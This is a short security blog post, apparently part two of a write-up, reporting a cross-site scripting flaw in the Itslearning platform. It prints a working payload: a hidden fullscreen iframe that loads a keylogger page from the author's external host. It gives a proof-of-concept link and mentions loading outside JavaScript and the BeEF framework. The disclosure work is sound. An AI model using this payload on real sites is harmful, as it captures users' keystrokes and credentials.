You should check the part 1 of this article.
Itslearning XSS – iFrame is the key!
With the help of an iframe which is fullscreen and hidden, I can execute my keylogger payload.
Payload and PoC;
<iframe src=”https://mustafakemalcan.com/keylog.html” style=”position:fixed; top:0px; left:0px; bottom:0px; right:0px; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;“>Your browser doesn’t support iframes</iframe>
PoC : https://files.itslearning.com/data/2099/13132/keylog.html
I can call my evil js by the way. So, I still can use BeeF XSS Framework.
The second XSS, I consider that not an harmful but I think Itslearning shouldn’t allow something like that.
I need say thanks to Ingvald Straume for helps in this process.